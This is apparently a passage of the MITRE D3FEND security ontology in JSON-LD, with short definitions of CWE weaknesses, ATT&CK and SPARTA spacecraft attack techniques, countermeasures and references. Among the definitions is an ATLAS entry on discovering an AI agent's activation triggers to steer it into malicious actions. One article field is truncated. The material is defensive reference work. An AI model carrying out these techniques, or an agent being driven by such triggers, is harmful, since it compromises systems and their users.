{
  "@context": {
    "d3f": "http://d3fend.mitre.org/ontologies/d3fend.owl#",
    "dbr": "http://dbpedia.org/resource/",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
    "owl": "http://www.w3.org/2002/07/owl#",
    "rdf": "http://www.w3.org/1999/02/22-rdf-syntax-ns#",
    "rdfs": "http://www.w3.org/2000/01/rdf-schema#",
    "skos": "http://www.w3.org/2004/02/skos/core#",
    "xml": "http://www.w3.org/XML/1998/namespace",
    "xsd": "http://www.w3.org/2001/XMLSchema#"
  },
  "@graph": [
    {
      "@id": "d3f:CWE-123",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-123",
      "d3f:definition": "Any condition where the attacker has the ability to write an arbitrary value to an arbitrary location, often as the result of a buffer overflow.",
      "rdfs:label": "Write-what-where Condition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-787"
      }
    },
    {
      "@id": "d3f:CWE-644",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-644",
      "d3f:definition": "The product does not neutralize or incorrectly neutralizes web scripting syntax in HTTP headers that can be used by web browser components that can process raw headers, such as Flash.",
      "rdfs:label": "Improper Neutralization of HTTP Headers for Scripting Syntax",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-116"
      }
    },
    {
      "@id": "d3f:SPARTAExfiltrationTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0008"
      },
      "rdfs:label": "Exfiltration Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:Ne54be4c6a6364ed9b32081a25f72c38c"
        }
      ],
      "skos:prefLabel": "Exfiltration Technique"
    },
    {
      "@id": "_:Ne54be4c6a6364ed9b32081a25f72c38c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0008"
      }
    },
    {
      "@id": "d3f:T1417.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1417.002",
      "d3f:definition": "Adversaries may mimic common operating system GUI components to prompt users for sensitive information with a seemingly legitimate prompt. The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Compared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique’s use.(Citation: Felt-PhishingOnMobileDevices)",
      "rdfs:label": "GUI Input Capture - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1417"
      },
      "skos:prefLabel": "GUI Input Capture"
    },
    {
      "@id": "d3f:DE-0003.02",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.02",
      "d3f:definition": "This counter records commands that failed checks or were refused. To hide probing and trial-and-error, the adversary suppresses increments, periodically clears the value, or forges the downlinked field so rejection rates appear benign. Variants also tamper with associated reason codes or event entries, replacing them with innocuous outcomes. Analysts reviewing telemetry see no evidence of failed attempts even as the system is being exercised aggressively.",
      "d3f:modifies": {
        "@id": "d3f:SystemPlatformVariable"
      },
      "rdfs:label": "Rejected Command Counter - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/02/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:N96b0c3b6943c42d4a98377f8ba73a05d"
        }
      ],
      "skos:prefLabel": "Rejected Command Counter"
    },
    {
      "@id": "_:N96b0c3b6943c42d4a98377f8ba73a05d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemPlatformVariable"
      }
    },
    {
      "@id": "d3f:Reference-GeneralUseOfLocksInTheProtectionAndControlOfFacilitiesRadioActiveMaterialsClassifiedInformationClassifiedMatterAndSafeguardsInformation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.nrc.gov/docs/ML1535/ML15357A411.pdf"
      },
      "d3f:kb-abstract": "This regulatory guide (RG) describes methods and procedures that the staff of the U.S. Nuclear\nRegulatory Commission (NRC) considers acceptable for the selection, use, and control of locking\ndevices. Locks can be used in the protection of: areas, facilities, certain radioactive materials, and\nspecific types of information (e.g., classified matter, National Security Information (NSI), Restricted Data\n(RD), Formerly Restricted Data (FRD), Safeguards Information (SGI)).",
      "d3f:kb-author": "U.S. NUCLEAR REGULATORY COMMISSION OFFICE OF NUCLEAR REGULATORY RESEARCH",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "U.S. NUCLEAR REGULATORY COMMISSION OFFICE OF NUCLEAR REGULATORY RESEARCH",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:PhysicalEnclosureHardening"
        },
        {
          "@id": "d3f:PhysicalLocking"
        }
      ],
      "d3f:kb-reference-title": "REGULATORY GUIDE 5.12 GENERAL USE OF LOCKS IN THE PROTECTION AND CONTROL OF: FACILITIES, RADIOACTIVE MATERIALS, CLASSIFIED INFORMATION, CLASSIFIED MATTER, AND SAFEGUARDS INFORMATION",
      "rdfs:label": "Reference - REGULATORY GUIDE 5.12 GENERAL USE OF LOCKS IN THE PROTECTION AND CONTROL OF: FACILITIES, RADIOACTIVE MATERIALS, CLASSIFIED INFORMATION, CLASSIFIED MATTER, AND SAFEGUARDS INFORMATION"
    },
    {
      "@id": "d3f:T1547.009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.009",
      "d3f:definition": "Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.",
      "d3f:may-modify": [
        {
          "@id": "d3f:SymbolicLink"
        },
        {
          "@id": "d3f:UserStartupScriptFile"
        }
      ],
      "rdfs:label": "Shortcut Modification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:Nd6b9cecdf47f48c68c12e42f489bed5a"
        },
        {
          "@id": "_:N9fab71f9a47345fca608f8df699ef3c8"
        }
      ]
    },
    {
      "@id": "_:Nd6b9cecdf47f48c68c12e42f489bed5a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SymbolicLink"
      }
    },
    {
      "@id": "_:N9fab71f9a47345fca608f8df699ef3c8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserStartupScriptFile"
      }
    },
    {
      "@id": "d3f:ATTACKMobileExecutionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0041"
      },
      "rdfs:label": "Execution Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N86cab9b03a90408191794bb5de872480"
        }
      ],
      "skos:prefLabel": "Execution Technique"
    },
    {
      "@id": "_:N86cab9b03a90408191794bb5de872480",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0041"
      }
    },
    {
      "@id": "d3f:T0805",
      "@type": "owl:Class",
      "d3f:attack-id": "T0805",
      "d3f:definition": "Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages.",
      "rdfs:label": "Block Serial COM - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Block Serial COM"
    },
    {
      "@id": "d3f:CWE-779",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-779",
      "d3f:definition": "The product logs too much information, making log files hard to process and possibly hindering recovery efforts or forensic analysis after an attack.",
      "rdfs:label": "Logging of Excessive Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-400"
      }
    },
    {
      "@id": "d3f:UserApplication",
      "@type": "owl:Class",
      "d3f:definition": "A user application is executed for an individual user on the user's personal computer or remotely by means of virtualization.  This is in contrast to service applications or enterprise software.",
      "rdfs:label": "User Application",
      "rdfs:seeAlso": {
        "@id": "dbr:Enterprise_software"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:M1039",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:ApplicationConfigurationHardening"
        },
        {
          "@id": "d3f:SystemFileAnalysis"
        }
      ],
      "rdfs:label": "Environment Variable Permissions"
    },
    {
      "@id": "d3f:T1027.017",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.017",
      "d3f:definition": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files.(Citation: Trustwave SVG Smuggling 2025) SVGs, or Scalable Vector Graphics, are vector-based image files constructed using XML. As such, they can legitimately include `<script>` tags that enable adversaries to include malicious JavaScript payloads. However, SVGs may appear less suspicious to users than other types of executable files, as they are often treated as image files.",
      "rdfs:label": "SVG Smuggling",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:FileEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving operations performed on digital files, encompassing actions such as creation, modification, deletion, access, and attribute or permission changes.",
      "rdfs:label": "File Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/file_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:Nefd1f273743b42b0b3dde436a9a03b7c"
        }
      ]
    },
    {
      "@id": "_:Nefd1f273743b42b0b3dde436a9a03b7c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:DataInventory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DataInventory"
      ],
      "d3f:d3fend-id": "D3-DI",
      "d3f:definition": "Data inventorying identifies and records the schemas, formats, volumes, and locations of data stored and used on the organization's architecture.",
      "d3f:inventories": [
        {
          "@id": "d3f:Database"
        },
        {
          "@id": "d3f:DocumentFile"
        }
      ],
      "d3f:kb-reference": {
        "@id": "d3f:Reference-DataProcessingAndScanningSystemsForGeneratingAndPopulatingADataInventory"
      },
      "d3f:synonym": [
        "Data Discovery",
        "Data Inventorying"
      ],
      "rdfs:label": "Data Inventory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AssetInventory"
        },
        {
          "@id": "_:N4fcf48e877684894a901ce1f6a003fda"
        },
        {
          "@id": "_:N0ff79e87458848cd803265a4f6dc4f6f"
        }
      ]
    },
    {
      "@id": "_:N4fcf48e877684894a901ce1f6a003fda",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:inventories"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "_:N0ff79e87458848cd803265a4f6dc4f6f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:inventories"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DocumentFile"
      }
    },
    {
      "@id": "d3f:ScriptApplicationProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A script application process is an application process interpreting an executable script.",
      "d3f:interprets": {
        "@id": "d3f:ExecutableScript"
      },
      "rdfs:label": "Script Application Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationProcess"
        },
        {
          "@id": "_:N69b125421a56454f8cb848b9291f7d44"
        }
      ],
      "skos:altLabel": "Script Process"
    },
    {
      "@id": "_:N69b125421a56454f8cb848b9291f7d44",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:interprets"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "d3f:AML.T0084.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0084.002",
      "d3f:definition": "Adversaries may discover keywords or other triggers (such as incoming emails, documents being added, incoming message, or other workflows) that activate an agent and may cause it to run additional actions.\n\nUnderstanding these triggers can reveal how the AI agent is activated and controlled. This may also expose additional paths for compromise, as an adversary could attempt to trigger the agent from outside its environment and drive it to perform unintended or malicious actions.",
      "rdfs:label": "Activation Triggers - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0084.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0084"
      },
      "skos:prefLabel": "Activation Triggers"
    },
    {
      "@id": "d3f:InputDeviceAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:InputDeviceAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:InputDevice"
      },
      "d3f:d3fend-id": "D3-IDA",
      "d3f:definition": "Operating system level mechanisms to prevent abusive input device exploitation.",
      "d3f:kb-article": "## How it works\n\nInput Device Hardening techniques filter certain commands, or disable related operating system functionality.\n\n### Analytics\n\nAll of these values can be analyzed and compared to a baseline:\n\n* Amount of input\n* Duration of a single input\n* Durations between inputs\n* Value of input\n\nContext can also include:\n\n* User which is logged in, to include attributes such as physical location of the user\n* Date and time\n* System which is processing the input\n* Source device of input, to include its properties (e.g. manufacturer), configuration (e.g. keyboard layout) and behavioral attributes of this device (e.g. first use)\n* Source system of input (local or remote system)\n* Other hardware devices attached to the system\n\n\n### Actions\n\nActions can include:\n\n* Disabling the source device\n* Sending an alert\n* Locking the current session (e.g. system screen lock, or returning to an authentication screen in a web app) and requiring one or more methods of authentication to continue\n* Administratively disabling credentials for the account or the entire account -- the technique *Account Locking*\n\n\n### Examples\nA malicious input device sends many keystrokes with approximately the same delay between each.  This does not match the normal cadence of input, and the device is disabled.\n\nInput to type the session user's name takes abnormally longer for each keystroke.  The system is locked to the password prompt screen.\n\nA system receives key press events from two different devices -- one device sends keystrokes after the other has been idle for a long time.\n\nA system receives physical input in a user session, while that user has sent input from a device located out of the country in the past hour.\n\nNetwork traffic is suddenly routed through a new external device, and nearly the same volume of network traffic is subsequently sent out the previously existing interface.  The new external device is disabled, and an alert is raised to investigate the network configuration for a potential compromise.\n\n\n## Considerations\n\nGiven some examples of legitimate behavioral input patterns, attackers could mimic those input patterns, a technique which has been used in popular culture in the creation of Deepfake videos and [This Person Does Not Exist](https://thispersondoesnotexist.com).",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-www.biometric-solutions.com_keystroke-dynamics"
        },
        {
          "@id": "d3f:Reference-ContinuousAuthenticationByAnalysisOfKeyboardTypingCharacteristics_BradfordUniv.,UK"
        }
      ],
      "rdfs:label": "Input Device Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemMonitoring"
        },
        {
          "@id": "_:Nea1c7d2a044442fab21f109fedb78f43"
        }
      ]
    },
    {
      "@id": "_:Nea1c7d2a044442fab21f109fedb78f43",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InputDevice"
      }
    },
    {
      "@id": "d3f:PhysicalLocking",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PhysicalLocking"
      ],
      "d3f:d3fend-id": "D3-EPL",
      "d3f:definition": "Employ a mechanical locking device for securing moveable portions of physical barriers (e.g., doors, gates, drawers) in a secured position.",
      "d3f:kb-article": "## How it works\n\nA physical mechanism which has an associated credential which, when entered, enables the lock bolt to operate, i.e. open or close.\n\n## Considerations\n\n* Consider that locks for specified materials should adhere to relevant regulations.\n\n* Lock equipment cabinets when not needed for operation or safety; set OT asset keys of devices (e.g., PLCs and safety systems) to the “RUN” position unless otherwise specified.\n\n* Locks and all associated hardware should be properly installed, operable, and free of substantive indications of tampering.\n\n* Records should be maintained concerning maintenance performed, access, and any possible tampering marks or associated incidents.\n\n* For locks operated by a physical key, a key management system should be implemented to manage and secure physical keys.\n\n* Key locks should provide a high degree of resistance to opening by force and tampering techniques.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-GeneralUseOfLocksInTheProtectionAndControlOfFacilitiesRadioActiveMaterialsClassifiedInformationClassifiedMatterAndSafeguardsInformation"
        },
        {
          "@id": "d3f:Reference-GuideToOTSecurity"
        }
      ],
      "d3f:mediates-access-to": {
        "@id": "d3f:ComputerEnclosure"
      },
      "rdfs:label": "Physical Locking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalAccessMediation"
        },
        {
          "@id": "_:Ncf277d0b2a1e4b47b6c683ccc4e5d39b"
        }
      ]
    },
    {
      "@id": "_:Ncf277d0b2a1e4b47b6c683ccc4e5d39b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:mediates-access-to"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ComputerEnclosure"
      }
    },
    {
      "@id": "d3f:T1041",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1041",
      "d3f:definition": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.",
      "d3f:may-transfer": {
        "@id": "d3f:CertificateFile"
      },
      "d3f:produces": {
        "@id": "d3f:InternetNetworkTraffic"
      },
      "rdfs:label": "Exfiltration Over C2 Channel",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExfiltrationTechnique"
        },
        {
          "@id": "_:Nb847f6fc2dba4b39b0b768519bbecfad"
        },
        {
          "@id": "_:Nd43e7370e6e8459b9dd45b54bd99d356"
        }
      ]
    },
    {
      "@id": "_:Nb847f6fc2dba4b39b0b768519bbecfad",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-transfer"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateFile"
      }
    },
    {
      "@id": "_:Nd43e7370e6e8459b9dd45b54bd99d356",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:SystemPasswordDatabase",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A password database used by a system service or process to authenticate users (e.g., Security Account Manager)",
      "rdfs:label": "System Password Database",
      "rdfs:subClassOf": {
        "@id": "d3f:PasswordDatabase"
      }
    },
    {
      "@id": "d3f:OSAPICreateFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that creates a file.",
      "d3f:invokes": {
        "@id": "d3f:CreateFile"
      },
      "rdfs:label": "OS API Create File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Nd8202cf2a50a468fa6a956a248bce148"
        }
      ]
    },
    {
      "@id": "_:Nd8202cf2a50a468fa6a956a248bce148",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateFile"
      }
    },
    {
      "@id": "d3f:T1565",
      "@type": "owl:Class",
      "d3f:attack-id": "T1565",
      "d3f:definition": "Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: Sygnia Elephant Beetle Jan 2022) By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.",
      "rdfs:label": "Data Manipulation",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:T1589.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1589.002",
      "d3f:definition": "Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.",
      "rdfs:label": "Email Addresses",
      "rdfs:subClassOf": {
        "@id": "d3f:T1589"
      }
    },
    {
      "@id": "d3f:OSAPISuspendProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that pauses the execution of a process.",
      "d3f:invokes": {
        "@id": "d3f:SuspendProcess"
      },
      "rdfs:label": "OS API Suspend Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Ncf6e697715564322a4fe88e8d17e35df"
        }
      ]
    },
    {
      "@id": "_:Ncf6e697715564322a4fe88e8d17e35df",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SuspendProcess"
      }
    },
    {
      "@id": "d3f:CWE-799",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-799",
      "d3f:definition": "The product does not properly limit the number or frequency of interactions that it has with an actor, such as the number of incoming requests.",
      "d3f:synonym": [
        "Brute force",
        "Insufficient anti-automation"
      ],
      "rdfs:label": "Improper Control of Interaction Frequency",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:AML.T0005.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0005.002",
      "d3f:definition": "Adversaries may use an off-the-shelf pre-trained model as a proxy for the victim model to aid in staging the attack.",
      "rdfs:label": "Use Pre-Trained Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0005.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0005"
      },
      "skos:prefLabel": "Use Pre-Trained Model"
    },
    {
      "@id": "d3f:IA-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0003",
      "d3f:definition": "Where spacecraft exchange data over inter-satellite links (RF or optical), a compromise on one vehicle can become a bridgehead to others. Threat actors exploit crosslink trust: shared routing, time distribution, service discovery, or gateway functions that forward commands and data between vehicles and ground. With knowledge of crosslink framing, addressing, and authentication semantics, an adversary can craft traffic that appears to originate from a trusted neighbor, injecting control messages, malformed service advertisements, or payload tasking that propagates across the mesh. In tightly coupled constellations, crosslinks may terminate on gateways that also touch the C&DH or payload buses, providing additional pivot opportunities. Because crosslink traffic is expected and often high volume, attacker activity can be timed to blend with synchronization intervals, ranging exchanges, or scheduled data relays.",
      "rdfs:label": "Crosslink via Compromised Neighbor - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Crosslink via Compromised Neighbor"
    },
    {
      "@id": "d3f:CCI-000139_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system alerts designated organization-defined personnel or roles in the event of an audit processing failure.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemDaemonMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000139"
    },
    {
      "@id": "d3f:CWE-759",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-759",
      "d3f:definition": "The product uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the product does not also use a salt as part of the input.",
      "rdfs:label": "Use of a One-Way Hash without a Salt",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-916"
      }
    },
    {
      "@id": "d3f:HTTPOptionsEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the HTTP OPTIONS method is used to describe the communication options for the target resource.",
      "rdfs:label": "HTTP OPTIONS Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:WindowsNtReadFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The NtReadFile routine reads data from an open file.",
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntreadfile"
      },
      "rdfs:label": "Windows NtReadFile",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIReadFile"
      }
    },
    {
      "@id": "d3f:Reference-IdentificationAndExtractionOfKeyForensicsIndicatorsOfCompromiseUsingSubject-specificFilesystemViews",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20200004962A1/en"
      },
      "d3f:kb-abstract": "A stackable filesystem that transparently tracks process file writes for forensic analysis. The filesystem comprises a base filesystem, and an overlay filesystem. Processes see the union of the upper and lower filesystems, but process writes are only reflected in the overlay. By providing per-process views of the filesystem using this stackable approach, a forensic analyzer can record a process's file-based activity—i.e., file creation, deletion, modification. These activities are then analyzed to identify indicators of compromise (IoCs). These indicators are then fed into a forensics analysis engine, which then quickly decides whether a subject (e.g., process, user) is malicious. If so, the system takes some proactive action to alert a proper authority, to quarantine the potential attack, or to provide other remediation. The approach enables forensic analysis without requiring file access mediation, or conducting system event-level collection and analysis, making it a lightweight, and non-intrusive solution.",
      "d3f:kb-author": "Frederico Araujo; Anne E. Kohlbrenner; Marc Philippe Stoecklin; Teryl Paul Taylor",
      "d3f:kb-reference-title": "Identification and extraction of key forensics indicators of compromise using subject-specific filesystem views",
      "rdfs:label": "Reference - Identification and extraction of key forensics indicators of compromise using subject-specific filesystem views"
    },
    {
      "@id": "d3f:Reference-ComputerMotherboardHavingPeripheralSecurityFunctions",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8869308B2/en"
      },
      "d3f:kb-abstract": "A secure motherboard for a computer, wherein each user accessible peripheral port is protected by hardware based peripheral protection circuitry soldered to the motherboard.",
      "d3f:kb-author": "Aviv Soffer",
      "d3f:kb-organization": "High Sec Labs Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:IOPortRestriction"
      },
      "d3f:kb-reference-title": "Computer motherboard having peripheral security functions",
      "rdfs:label": "Reference - Computer motherboard having peripheral security functions"
    },
    {
      "@id": "d3f:ExpectedModelChange",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-EMC",
      "d3f:definition": "Supervised learning establishes a relationship between the known input and output variables to conduct a predictive analysis.",
      "d3f:kb-article": "nal Consiterations\n\n## References\nIntro to Active Learning. inovex Blog. [Link](https://www.inovex.de/de/blog/intro-to-active-learning/).",
      "rdfs:label": "Expected Model Change",
      "rdfs:subClassOf": {
        "@id": "d3f:ActiveLearning"
      }
    },
    {
      "@id": "d3f:REC-0005.01",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0005.01",
      "d3f:definition": "Uplink reconnaissance focuses on capturing the command path from ground to spacecraft to learn telecommand framing, authentication fields, timing, and anti-replay behavior. Valuable artifacts include emission designators, symbol rates, polarization sense, Doppler profiles, and any preambles or ranging tones that gate command acceptance. Even if payload and TT&C share spectrum, their authentication postures often differ, knowledge an adversary can exploit. Partial captures, console screenshots, or training recordings reduce the effort needed to build an SDR pipeline that “looks right” on the air. Where missions authenticate without encrypting the uplink, traffic analysis can reveal command cadence and maintenance windows.",
      "rdfs:label": "Uplink Intercept Eavesdropping - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0005/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0005"
      },
      "skos:prefLabel": "Uplink Intercept Eavesdropping"
    },
    {
      "@id": "d3f:T1641.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1641.001",
      "d3f:definition": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity. By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, or decision making.",
      "rdfs:label": "Transmitted Data Manipulation - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1641"
      },
      "skos:prefLabel": "Transmitted Data Manipulation"
    },
    {
      "@id": "d3f:T1505.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1505.006",
      "d3f:definition": "Adversaries may abuse vSphere Installation Bundles (VIBs) to establish persistent access to ESXi hypervisors. VIBs are collections of files used for software distribution and virtual system management in VMware environments. Since ESXi uses an in-memory filesystem where changes made to most files are stored in RAM rather than in persistent storage, these modifications are lost after a reboot. However, VIBs can be used to create startup tasks, apply custom firewall rules, or deploy binaries that persist across reboots. Typically, administrators use VIBs for updates and system maintenance.",
      "rdfs:label": "vSphere Installation Bundles",
      "rdfs:subClassOf": {
        "@id": "d3f:T1505"
      }
    },
    {
      "@id": "d3f:T1016",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1016",
